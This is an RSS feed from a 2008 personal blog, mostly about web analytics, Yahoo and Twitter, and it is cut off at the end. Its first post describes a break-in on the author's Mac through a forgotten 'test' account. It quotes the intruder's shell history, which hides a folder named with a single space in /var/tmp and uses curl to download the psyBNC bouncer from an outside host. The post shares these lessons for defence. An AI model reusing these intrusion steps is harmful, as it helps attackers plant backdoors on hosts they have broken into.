<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet href="http://feeds.feedburner.com/~d/styles/rss2full.xsl" type="text/xsl" media="screen"?><?xml-stylesheet href="http://feeds.feedburner.com/~d/styles/itemcontent.css" type="text/css" media="screen"?><rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0">

<channel>
	<title>bobpage.net</title>
	
	<link>http://bobpage.net</link>
	<description />
	<pubDate>Fri, 25 Jul 2008 05:10:13 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.6.2</generator>
	<language>en</language>
			<atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" href="http://feeds.feedburner.com/bobpagenet" type="application/rss+xml" /><item>
		<title>The Break-in</title>
		<link>http://feeds.feedburner.com/~r/bobpagenet/~3/345323151/</link>
		<comments>http://bobpage.net/2008/07/24/the-break-in/#comments</comments>
		<pubDate>Fri, 25 Jul 2008 05:00:08 +0000</pubDate>
		<dc:creator>Bob Page</dc:creator>
		
		<category><![CDATA[Mac]]></category>

		<category><![CDATA[Personal]]></category>

		<category><![CDATA[Privacy]]></category>

		<guid isPermaLink="false">http://bobpage.net/2008/07/24/the-break-in/</guid>
		<description><![CDATA[
I am so ashamed.
I was once a system &#38; network manager, so I know about things like bad passwords and scanning software. Later, I built firewalls for Sun. Lately I&#8217;ve lectured on the importance of locking down your web analytics data, and the precautions you need to take. So imagine my shock to discover that [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.flickr.com/photos/musicalwoods/2219478286/"><img src="http://farm3.static.flickr.com/2311/2219478286_c9753cef9f_m.jpg" height="180" width="240" align="right" hspace="4" vspace="4" title="The Scary Door by musicalwds" alt="The Scary Door by musicalwds" /></a></p>
<p>I am so ashamed.</p>
<p>I was once a system &amp; network manager, so I know about things like bad passwords and scanning software. Later, I built firewalls for Sun. Lately I&#8217;ve lectured on the importance of locking down your web analytics data, and the precautions you need to take. So imagine my shock to discover that my home desktop Mac was broken into. Yep. I had enabled remote logins through my firewall, which is innocent enough, but during a fit of debugging some USB problems, I set up new user named &#8220;test&#8221; with a password of .. you guessed it. I remember at the time thinking &#8220;don&#8217;t pick &#8216;test&#8217; as a user name, and certainly don&#8217;t use it as the password&#8221; but I was in a hurry and I did it anyway. I finished my debugging, but forgot about the account.</p>
<p>Oh, and of course, I set it up with full administrator privileges.</p>
<p>Tonight I&#8217;m poking through my log files (I&#8217;m still debugging for the source of this USB error on my system, it&#8217;s driving me nuts), and I notice that some scanning software came by today, trying to log into zillions of accounts. I was smugly scrolling through the list of user names it was trying until I got to &#8220;test&#8221; and &#8230; it didn&#8217;t log in. It didn&#8217;t know the password. I first thought, holy crap, I left that account enabled. Then I thought, how could it not guess the password?</p>
<p>The reason: because somebody else had, three days ago. And changed it.</p>
<p>I brought up a Terminal window, and typed &#8220;last test&#8221; which gives me a list of the previous logins. Sure enough, some fine program/human had logged in to my system three days ago, and stayed for 1 minute. So I went to the &#8220;test&#8221; home directory, where I conveniently found a list of what happened when they logged in:</p>
<pre>
1. w
2. passwd
3. uname -a
4. exit
5. cd /var/tmp
6. mkdir " "
7. cd " "
8. curl -O geocities.com/myhael_ilie/psyd,tar.gz
9. curl -O geocities.com/myhael_ilie/psyd,tar.gz
10. exit
</pre>
<p>Translation:</p>
<ol>
<li>See who&#8217;s on.</li>
<li>Change the password for user &#8220;test&#8221;.</li>
<li>See what kind of system this is.</li>
<li>Logout.</li>
<li>Go to a folder commonly used for temporary files.</li>
<li>Create a folder named &#8221; &#8221; (just a single space).</li>
<li>Change to that folder.</li>
<li>Download a file from the web.</li>
<li>Try the download again.</li>
<li>Give up, and log out.</li>
</ol>
<p>So why did the <code>curl</code> commands fail? It&#8217;s because I use <a href="http://www.obdev.at/products/littlesnitch/index.html">Little Snitch</a>, which asks my permission every time a random command tries to access the Internet. Since I wasn&#8217;t at the computer at the time, I never gave my OK, and Little Snitch prevented the &#8216;curl&#8217; from working. The person would have seen this:</p>
<p><code>curl: (7) Failed to connect to 66.218.77.68: Host is down</code></p>
<p>So what <em>was</em> in <code>psyd,tar.gz</code>? Well, actually it&#8217;s a typo. The real name doesn&#8217;t have a comma in it, but the person who logged in didn&#8217;t notice the mistake because of the &#8220;host is down&#8221; message. I grabbed the correct file and took a look at it. It is <a href="http://en.wikipedia.org/wiki/PsyBNC">psyBNC</a>, an &#8220;IRC bouncer&#8221;, but can be used to install backdoors and other nastiness. The file contains the complete source code, as well as a fully-functioning Mac executable.</p>
<p>Fortunately, that&#8217;s the end of the story. Several lessons here, ones which I&#8217;ve told others far too many times:</p>
<ol>
<li>Do what you can to prevent break-ins.</li>
<li>Log everything so you can figure out how the inevitable break-in happened.</li>
<li>Convenience is often at the expense of security</li>
</ol>
<p>I was incredibly lucky. A simple <code>sudo bash</code> would have given this person root access, and they could have erased everything on my system, or worse. In fact, they <em>could</em> have, and then erased all traces of what they did, but I have enough logging and checks to know that they didn&#8217;t do anything but what&#8217;s described above.</p>
<p>I humbly admit all of this in the hope that you can learn from my near miss.</p>
<p>And yes, I removed the &#8220;test&#8221; account.</p>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~f/bobpagenet?a=za3jEJ"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=za3jEJ" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/bobpagenet?a=Oi7sxj"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=Oi7sxj" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/bobpagenet?a=q9IS3j"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=q9IS3j" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/bobpagenet?a=3k7zDj"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=3k7zDj" border="0"></img></a>
</div>]]></content:encoded>
			<wfw:commentRss>http://bobpage.net/2008/07/24/the-break-in/feed/</wfw:commentRss>
		<feedburner:origLink>http://bobpage.net/2008/07/24/the-break-in/</feedburner:origLink></item>
		<item>
		<title>Dancing about Architecture</title>
		<link>http://feeds.feedburner.com/~r/bobpagenet/~3/277966436/</link>
		<comments>http://bobpage.net/2008/04/25/dancing-about-architecture/#comments</comments>
		<pubDate>Sat, 26 Apr 2008 00:52:50 +0000</pubDate>
		<dc:creator>Bob Page</dc:creator>
		
		<category><![CDATA[Blogging]]></category>

		<category><![CDATA[Web]]></category>

		<guid isPermaLink="false">http://bobpage.net/2008/04/25/dancing-about-architecture/</guid>
		<description><![CDATA[Blogging about Twitter. Reminds me that Talking about music is like dancing about architecture &#8230;and I&#8217;ve already blogged about Twitter more than once. While we&#8217;re a good year and a half into Twitter, and it&#8217;s been mildly entertaining, I&#8217;m starting to see value now. So this post is for the folks still scratching their heads.
There&#8217;s [...]]]></description>
			<content:encoded><![CDATA[<p>Blogging about Twitter. Reminds me that <a href="http://www.pacifier.com/~ascott/they/tamildaa.htm">Talking about music is like dancing about architecture</a> &#8230;and I&#8217;ve already blogged about Twitter more than once. While we&#8217;re a good year and a half into Twitter, and it&#8217;s been mildly entertaining, I&#8217;m starting to see value now. So this post is for the folks still scratching their heads.</p>
<p>There&#8217;s a critical mass (or tipping point, if you are so inclined) of people you need to follow such that a micro-community emerges. Once that happens, you get two things. One is quick notification of important/interesting events/news/blog posts. In fact since I&#8217;m following so many web analytics folks, I no longer have to rely on my RSS reader to bring me the big stories &#8212; the community points them out. Of course you need to be following the right people for your interests - people who say interesting things.</p>
<p>Second is ability to get feedback. I admit I don&#8217;t use this a lot, but it <a href="http://twitter.com/bobpage/statuses/796226128">can be handy</a>, depending on your community size. Of course it didn&#8217;t help me find a 13-year old copy of Windows&#8230;</p>
<p>(In response to <a href="http://blog.webanalyticsdemystified.com/weblog/2008/04/now-i-too-am-a-lazy-blogger.html">Eric&#8217;s comment in one of his posts</a>, yeah, my <a href="http://twitter.com/bobpage/statuses/792148319">&#8220;lazy blogger&#8221;</a> tweet to him, welcoming him to Twitter, was paraphrased from something June said to me at eMetrics last spring, about Twitter being the lazy man&#8217;s blog. At the time I couldn&#8217;t tell if she felt it was a compliment or a condemnation, but now I know.)</p>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~f/bobpagenet?a=OwTopCG"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=OwTopCG" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/bobpagenet?a=QQ2TULg"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=QQ2TULg" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/bobpagenet?a=noQpX4g"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=noQpX4g" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/bobpagenet?a=qEed8Ug"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=qEed8Ug" border="0"></img></a>
</div>]]></content:encoded>
			<wfw:commentRss>http://bobpage.net/2008/04/25/dancing-about-architecture/feed/</wfw:commentRss>
		<feedburner:origLink>http://bobpage.net/2008/04/25/dancing-about-architecture/</feedburner:origLink></item>
		<item>
		<title>Yahoo! is hiring (really!)</title>
		<link>http://feeds.feedburner.com/~r/bobpagenet/~3/275517219/</link>
		<comments>http://bobpage.net/2008/04/22/yahoo-is-hiring-really/#comments</comments>
		<pubDate>Tue, 22 Apr 2008 16:42:47 +0000</pubDate>
		<dc:creator>Bob Page</dc:creator>
		
		<category><![CDATA[Yahoo]]></category>

		<guid isPermaLink="false">http://bobpage.net/2008/04/22/yahoo-is-hiring-really/</guid>
		<description><![CDATA[
What with all the news about Yahoo! laying off people, you could be forgiven for thinking that the company isn&#8217;t hiring. But in fact, it is. The company &#8220;de-invested&#8221; in several areas, but is increasing investment in others. Even the data team changed a number of projects, which impacted some people. But Y! is hiring, [...]]]></description>
			<content:encoded><![CDATA[<p><img src="http://bobpage.net/wp-content/uploads/2008/04/200804211649.jpg" width="75" height="75" alt="200804211649.jpg" style="float:left; margin-bottom:2px; margin-right:4px;" /></p>
<p>What with all the news about Yahoo! laying off people, you could be forgiven for thinking that the company isn&#8217;t hiring. But in fact, it is. The company &#8220;de-invested&#8221; in several areas, but is increasing investment in others. Even the data team changed a number of projects, which impacted some people. But Y! is hiring, and the data team is hiring. In fact we really need help, especially if you know C++ and/or SQL. Details are at <a href="http://careers.yahoo.com/">http://careers.yahoo.com/</a></p>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~f/bobpagenet?a=JlaHWaG"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=JlaHWaG" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/bobpagenet?a=0FCrp0g"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=0FCrp0g" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/bobpagenet?a=9HHB2hg"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=9HHB2hg" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/bobpagenet?a=RS9qHTg"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=RS9qHTg" border="0"></img></a>
</div>]]></content:encoded>
			<wfw:commentRss>http://bobpage.net/2008/04/22/yahoo-is-hiring-really/feed/</wfw:commentRss>
		<feedburner:origLink>http://bobpage.net/2008/04/22/yahoo-is-hiring-really/</feedburner:origLink></item>
		<item>
		<title>Baseball, Sabermetrics, Freakonomics and Web Analytics</title>
		<link>http://feeds.feedburner.com/~r/bobpagenet/~3/267487856/</link>
		<comments>http://bobpage.net/2008/04/09/baseball-sabermetrics-freakonomics-and-web-analytics/#comments</comments>
		<pubDate>Thu, 10 Apr 2008 05:37:38 +0000</pubDate>
		<dc:creator>Bob Page</dc:creator>
		
		<category><![CDATA[Analytics]]></category>

		<guid isPermaLink="false">http://bobpage.net/2008/04/09/baseball-sabermetrics-freakonomics-and-web-analytics/</guid>
		<description><![CDATA[Great read over on the Freakonomics blog with Bill James, the data wizard for the Boston Red Sox. A few choice quotes rang true for me; he could have been talking about web analytics:

I would say generally that baseball statistics are always trying to mislead you, and that it is a constant battle not to [...]]]></description>
			<content:encoded><![CDATA[<p><img src="http://bobpage.net/wp-content/uploads/2008/04/sabr.gif" height="55" width="117" border="1" align="right" hspace="4" vspace="4" alt="SABR logo" title="SABR logo" />Great read over on the <a href="http://freakonomics.blogs.nytimes.com/2008/04/01/bill-james-answers-all-your-baseball-questions/">Freakonomics blog</a> with Bill James, the data wizard for the Boston Red Sox. A few choice quotes rang true for me; he could have been talking about web analytics:</p>
<blockquote><p>
I would say generally that baseball statistics are always trying to mislead you, and that it is a constant battle not to be misled by them.
</p></blockquote>
<p>&#8230;</p>
<blockquote><p>
We haven’t figured out anything yet. A hundred years from now, we won’t have begun to have the game figured out.
</p></blockquote>
<p>and to who should have a larger role in player evaluations, scouts or stats guys:</p>
<blockquote><p>
Ninety-five percent scouts, five percent stats. [...] the knowledge of who will improve is vastly more important than the knowledge of who is good. Stats can tell you who is good, but they’re almost 100 percent useless when it comes to who will improve.
</p></blockquote>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~f/bobpagenet?a=aaoumLG"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=aaoumLG" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/bobpagenet?a=DD07m0g"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=DD07m0g" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/bobpagenet?a=DTyBrBg"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=DTyBrBg" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/bobpagenet?a=CPMCfLg"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=CPMCfLg" border="0"></img></a>
</div>]]></content:encoded>
			<wfw:commentRss>http://bobpage.net/2008/04/09/baseball-sabermetrics-freakonomics-and-web-analytics/feed/</wfw:commentRss>
		<feedburner:origLink>http://bobpage.net/2008/04/09/baseball-sabermetrics-freakonomics-and-web-analytics/</feedburner:origLink></item>
		<item>
		<title>Yahoo! acquires IndexTools</title>
		<link>http://feeds.feedburner.com/~r/bobpagenet/~3/266952897/</link>
		<comments>http://bobpage.net/2008/04/09/yahoo-acquires-indextools/#comments</comments>
		<pubDate>Wed, 09 Apr 2008 11:11:10 +0000</pubDate>
		<dc:creator>Bob Page</dc:creator>
		
		<category><![CDATA[Analytics]]></category>

		<category><![CDATA[Notable]]></category>

		<category><![CDATA[Yahoo]]></category>

		<guid isPermaLink="false">http://bobpage.net/2008/04/09/yahoo-acquires-indextools/</guid>
		<description><![CDATA[
Today Yahoo! and IndexTools announced that Yahoo! is acquiring IndexTools.  Here is the official press release.
I&#8217;m really jazzed about it.  IndexTools is a great group that&#8217;s been laser focused on the stuff that customers care about.  They have a very practical attitude towards their products. Because they started in 2000, they learned [...]]]></description>
			<content:encoded><![CDATA[<p><img src="http://bobpage.net/wp-content/uploads/2008/04/iphonehungary.jpg" height="300" width="202" border="0" align="right" hspace="4" vspace="4" alt="iPhone in Hungary" title="iPhone in Hungary" /><br />
Today Yahoo! and IndexTools announced that <a href="http://ycorpblog.com/2008/04/09/numbers-that-mean-business/">Yahoo! is acquiring IndexTools</a>.  Here is the official <a href="http://biz.yahoo.com/bw/080409/20080409005418.html?.v=1">press release</a>.</p>
<p>I&#8217;m really jazzed about it.  IndexTools is a great group that&#8217;s been laser focused on the stuff that customers care about.  They have a very practical attitude towards their products. Because they started in 2000, they learned from the pioneers, and built a deep analytics system that really works well.  That much was clear as soon as we popped the hood and poked around inside .. unlike a lot of their competition, they didn&#8217;t have an old and a new product that they bolted together.</p>
<p>So does this mean we&#8217;re going to do “Yahoo! Analytics”, and try to “steal” web sites away from Google Analytics or the commercial web analytics vendors?  See, that&#8217;s not what this is about.  Yahoo! has stated its desire to be a “partner of choice”, and as the new Yahoo! strategy began to sink in, it became clear that the new Yahoo! was going to need to offer a new level of products to its partners.  We have many, many thousands of small and medium businesses partnering with us now, and we want to make sure they have the tools they need.  We&#8217;ve already announced an open strategy where developers can take advantage of Yahoo! products and services; we want to make sure they get the analytics they need too.  Yahoo! has so many partners in so many places that can benefit from this technology, it became clear &#8212; even obvious &#8212; it was now the right thing to do.</p>
<p>Yeah, we still have a team working on analytics solutions for our “owned and operated” world &#8212; Yahoo! is too big a customer for IndexTools, or any other commercial vendor for that matter.  There&#8217;s a world of difference between massive scale for one huge customer, and massive scale for a huge number of small and medium-sized customers.  Now we have both.</p>
<p>As for what this means for the web analytics industry, I&#8217;ll leave that to the pundits, analysts and fortune tellers.</p>
<p>Here&#8217;s some of the combined team after a day of meetings at IndexTools.</p>
<p><img src="http://bobpage.net/wp-content/uploads/2008/04/indextoolsdinner.jpg" height="248" width="500" border="0" hspace="4" vspace="4" alt="IndexTools-Yahoo! Dinner" title="IndexTools-Yahoo! Dinner" /></p>
<p>(and yes, that&#8217;s <a href="http://visualrevenue.com/blog/">Dennis</a> at the head of the table, farthest away from the camera.)</p>
<p>Some reactions from around the web:</p>
<ul>
<li><a href="http://visualrevenue.com/blog/2008/04/yahoo-acquires-web-analytics-company.html">Dennis Mortensen</a></li>
<li><a href="http://blog.webanalyticsdemystified.com/weblog/2008/04/how-yahoo-buying-indextools-changes-web-analytics.html">Eric Peterson</a></li>
<li><a href="http://webanalytics.ox2.eu/2008/04/09/yahoo-acquires-indextools-congrats-to-both/">Rene Dechamps Otamendi</a></li>
<li><a href="http://webanalytics.ox2.eu/2008/04/09/on-yahoos-acquisition-of-indextools/">Julien Coquet</a></li>
<li><a href="http://www.nettakeaway.com/tp/article/363/yahoo-acquires-indextools">Michael Wexler</a></li>
<li><a href="http://www.liesdamnedlies.com/2008/04/way-to-go-denni.html">Ian Thomas</a></li>
<li><a href="http://webanalysis.blogspot.com/2008/04/web-analytics-industry-consolidation.html">Anil Batra</a></li>
<li><a href="http://theanalyticsguru.wordpress.com/2008/04/09/yahoo-buys-indextools/">Marshall Sponder</a></li>
<li><a href="http://www.webanalysts.info/webanalytics/yahoo-to-acquire-indextools/">Lars Johansson</a></li>
<li><a href="http://emetrics.wordpress.com/2008/04/09/yahoo-to-buy-indextools/">Jim Sterne</a></li>
<li><a href="http://www.pcdoctor-community.com/blog/posts/2008/04/09/Yahoo-+-Indextools-Microsoft-Acquisition/">Chris Hill</a></li>
<li><a href="http://weblogs.jupiterresearch.com/analysts/jlovett/archives/2008/04/yahoo_analytics_1.html">John Lovett</a></li>
</ul>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~f/bobpagenet?a=VeU3WZG"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=VeU3WZG" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/bobpagenet?a=vhwgehg"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=vhwgehg" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/bobpagenet?a=T6sycWg"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=T6sycWg" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/bobpagenet?a=QSF9Ueg"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=QSF9Ueg" border="0"></img></a>
</div>]]></content:encoded>
			<wfw:commentRss>http://bobpage.net/2008/04/09/yahoo-acquires-indextools/feed/</wfw:commentRss>
		<feedburner:origLink>http://bobpage.net/2008/04/09/yahoo-acquires-indextools/</feedburner:origLink></item>
		<item>
		<title>Is Web Analytics Easy or Hard?</title>
		<link>http://feeds.feedburner.com/~r/bobpagenet/~3/266530971/</link>
		<comments>http://bobpage.net/2008/04/08/is-web-analytics-easy-or-hard/#comments</comments>
		<pubDate>Tue, 08 Apr 2008 19:00:26 +0000</pubDate>
		<dc:creator>Bob Page</dc:creator>
		
		<category><![CDATA[Analytics]]></category>

		<guid isPermaLink="false">http://bobpage.net/2008/04/08/is-web-analytics-easy-or-hard/</guid>
		<description><![CDATA[In the words of Bill Clinton, &#8220;it depends on what you mean by &#8230;&#8221;
The web analytics is easy / hard discussion among various thought leaders has been interesting but I can&#8217;t help but think a little self-serving.  I had a long preachy post ready to go but even I was bored by it.  [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://flickr.com/photos/spackletoe/90811910/"><img src="http://bobpage.net/wp-content/uploads/2008/04/43-90811910-4bd1985f37-m.jpg" height="180" width="240" align="right" hspace="4" vspace="4" alt="easy button from spackletoe on flickr" title="easy button from spackletoe on flickr" longdesc="http://flickr.com/photos/spackletoe/90811910/" /></a>In the words of Bill Clinton, &#8220;it depends on what you mean by &#8230;&#8221;</p>
<p>The web analytics is easy / hard discussion among various thought leaders has been interesting but I can&#8217;t help but think a little self-serving.  I had a long preachy post ready to go but even <em>I</em> was bored by it.  Instead, let me offer some observations:</p>
<p>Technology:</p>
<ul>
<li>Web data is messy.  It doesn&#8217;t fit into cubes (think path analysis by segment) for instance.  So it requires special handling.</li>
<li>Web data is noisy.  Think robots and cookie deletion.</li>
<li>Web analytics is nonstandard.  Despite the efforts of the IAB, WAA and others, nobody can say &#8220;we use the <em>computation standard</em> to determine this&#8221; - because there is no computation standard.  Count web 2.0 for me&#8230;</li>
</ul>
<p>If you want to chase the rabbit down the hole, you&#8217;ll decide that web analytics is <em>hard</em>.  if you want to defer these kinds of things to a tool vendor who will sell you turnkey &#8220;best practices&#8221; then web analytics is <em>easy</em>.</p>
<p>Process:</p>
<ul>
<li>In business, speed of deployment is king. Thus it&#8217;s easier to look at pre-built reports than create them from scratch.</li>
<li>Lack of integration with the business goals means lack of actionability.  Most analytics is like driving by looking into the glove box - interesting but irrelevant.</li>
<li>As a result of the first two, there&#8217;s an emphasis on quantitative over qualitative analysis &#8212; which means there very little &#8220;analytics&#8221; at all, just metrics trending.</li>
<li>When you don&#8217;t <em>first</em> design your analysis from business goals, you grab as much data as you can, and pick and choose the data that supports your hypothesis &#8212; either you&#8217;re in report hell, or analysis paralysis.  For a very visceral example of this, look at how most people do experimentation.</li>
</ul>
<p>If you design your analytics to meet your strategy, and staff for it, the implementation is long (and complex, yes) but the resulting analytics are <em>easy</em>.  If you want to defer to a tool vendor who will sell you turnkey &#8220;best practices&#8221; then web analytics is <em>hard</em>.</p>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~f/bobpagenet?a=Y4NbF5G"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=Y4NbF5G" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/bobpagenet?a=uvD1pgg"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=uvD1pgg" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/bobpagenet?a=vRPB4vg"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=vRPB4vg" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/bobpagenet?a=bCdLUig"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=bCdLUig" border="0"></img></a>
</div>]]></content:encoded>
			<wfw:commentRss>http://bobpage.net/2008/04/08/is-web-analytics-easy-or-hard/feed/</wfw:commentRss>
		<feedburner:origLink>http://bobpage.net/2008/04/08/is-web-analytics-easy-or-hard/</feedburner:origLink></item>
		<item>
		<title>How To Excite People About Web Analytics: Five Finger Tips</title>
		<link>http://feeds.feedburner.com/~r/bobpagenet/~3/266594291/</link>
		<comments>http://bobpage.net/2008/04/08/how-to-excite-people-about-web-analytics-five-finger-tips/#comments</comments>
		<pubDate>Tue, 08 Apr 2008 12:49:00 +0000</pubDate>
		<dc:creator>Bob Page</dc:creator>
		
		<category><![CDATA[Analytics]]></category>

		<guid isPermaLink="false">http://bobpage.net/2008/04/08/how-to-excite-people-about-web-analytics-five-finger-tips/</guid>
		<description><![CDATA[It&#8217;s been said that people would rather pull off a finger nail than learn how to leverage their website data.  I&#8217;ve thought about that a lot lately, and think I have the answer:
A good manicure. French, maybe.
But really, this is all soo sad because the reality is that. . . .
Web Analytics is like [...]]]></description>
			<content:encoded><![CDATA[<p>It&#8217;s been said that people would rather pull off a finger nail than learn how to leverage their website data.  I&#8217;ve thought about that a lot lately, and think I have the answer:</p>
<p>A good manicure. French, maybe.</p>
<p>But really, this is all soo sad because the reality is that. . . .</p>
<p>Web Analytics is like a drag queen: It has Really Big Hair, killer eye makeup, and knows how to promote itself:</p>
<p><img src="http://bobpage.net/wp-content/uploads/2008/04/n681741454-702783-9743.jpg" height="400" width="300" border="0" hspace="4" vspace="4" /></p>
<p>Right?</p>
<p>We believe it, but how do we get to a point where others in the organization do as well?</p>
<p><strong>Step One</strong> for each and everyone of us (and you are unique and abnormal in that you read a web analytics blog!) is to accept and recognize the fact that Web Analytics might might be seen as outside the mainstream and a bit freakish. Once you accept then you can move on and do something about it.</p>
<p>I think that&#8217;s all the steps required, really!</p>
<p><small>With extreme apologies to <a href="http://www.kaushik.net/avinash/2008/04/how-to-excite-people-about-web-analytics-five-tips.html">Avinash</a>, and extreme thanks to <a href="http://twitter.com/jdersh/statuses/785245526">June</a>.</small></p>
<p><small>PS to Jim Sterne: no, I will not.  Don&#8217;t even ask, &#8216;K?</small></p>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~f/bobpagenet?a=3zXsRJG"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=3zXsRJG" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/bobpagenet?a=CdG3Fzg"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=CdG3Fzg" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/bobpagenet?a=YFlmyMg"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=YFlmyMg" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/bobpagenet?a=sJois8g"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=sJois8g" border="0"></img></a>
</div>]]></content:encoded>
			<wfw:commentRss>http://bobpage.net/2008/04/08/how-to-excite-people-about-web-analytics-five-finger-tips/feed/</wfw:commentRss>
		<feedburner:origLink>http://bobpage.net/2008/04/08/how-to-excite-people-about-web-analytics-five-finger-tips/</feedburner:origLink></item>
		<item>
		<title>New Web Analytics Blogs To Watch</title>
		<link>http://feeds.feedburner.com/~r/bobpagenet/~3/265971056/</link>
		<comments>http://bobpage.net/2008/04/07/new-web-analytics-blogs-to-watch/#comments</comments>
		<pubDate>Mon, 07 Apr 2008 23:43:50 +0000</pubDate>
		<dc:creator>Bob Page</dc:creator>
		
		<category><![CDATA[Analytics]]></category>

		<category><![CDATA[Blogging]]></category>

		<guid isPermaLink="false">http://bobpage.net/2008/04/07/new-web-analytics-blogs-to-watch/</guid>
		<description><![CDATA[Two new blogs today&#8230;

eMetrics from Jim Sterne, who probably needs no introduction, and


metricbox from William Garrison, a Senior Professional Services Engineer (I assume from WebTrends)
Welcome to the discussion, Jim and William!
(As always, when I find new blogs that seem to touch on web analytics, I tag them with the wablogger keyword on del.icio.us.  Social [...]]]></description>
			<content:encoded><![CDATA[<p>Two new blogs today&#8230;</p>
<p><img src="http://bobpage.net/wp-content/uploads/2008/04/images-sitedesign-jimsterne-left.jpg" height="190" width="150" hspace="4" vspace="4" alt=" Images Sitedesign Jimsterne Left" title=" Images Sitedesign Jimsterne Left" /></p>
<p><a href="http://emetrics.wordpress.com/">eMetrics</a> from Jim Sterne, who probably needs no introduction, and</p>
<hr />
<img src="http://bobpage.net/wp-content/uploads/2008/04/whgbw.jpg" height="220" width="134" border="0" hspace="4" vspace="4" alt="William Garrison" title="William Garrison" /><br />
<a href="http://metricbox.blogspot.com/">metricbox</a> from William Garrison, a Senior Professional Services Engineer (I assume from WebTrends)</p>
<p>Welcome to the discussion, Jim and William!</p>
<p>(As always, when I find new blogs that seem to touch on web analytics, I tag them with the <a href="http://del.icio.us/tag/wablogger">wablogger</a> keyword on <a href="http://del.icio.us/tag/wablogger">del.icio.us</a>.  Social bookmarking, baby! Sure beats keeping a blogroll up to date.)</p>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~f/bobpagenet?a=eMVYZNG"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=eMVYZNG" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/bobpagenet?a=eN2grog"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=eN2grog" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/bobpagenet?a=4A7LALg"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=4A7LALg" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/bobpagenet?a=hwO0uFg"><img src="http://feeds.feedburner.com/~f/bobpagenet?i=hwO0uFg" border="0"></img></a>
</div>]]></content:encoded>
			<wfw:commentRss>http://bobpage.net/2008/04/07/new-web-analytics-blogs-to-watch/feed/</wfw:commentRss>
		<feedburner:origLink>http://bobpage.net/2008/04/07/new-web-analytics-blogs-to-watch/</feedburner:origLink></item>
		<item>
		<title>New WebTrends CEO</title>
		<link>http://feeds.feedburner.com/~r/bobpagenet/~3/265788919/</link>
		<comments>http://bobpage.net/2008/04/07/new-webtrends-ceo/#comments</comments>
		<pubDate>Mon, 07 Apr 2008 17:14:59 +0000</pubDate>
		<dc:creator>Bob Page</dc:creator>
		
		<category><![CDATA[Analytics]]></category>

		<guid isPermaLink="false">http://bobpage.net/2008/04/07/new-webtrends-ceo/</guid>
		<description><![CDATA[Congrats to WebTrends who announced their new CEO today.  Dan Stickel is no stranger to the Internet, having done executive stints at Google and AltaVista.
The press release quotes Dan: &#8220;The web analytics market is forecast for nearly 20% growth in 2008, and the growth in enterprise marketing software is even greater.&#8221;  Looks like [...]]]></description>
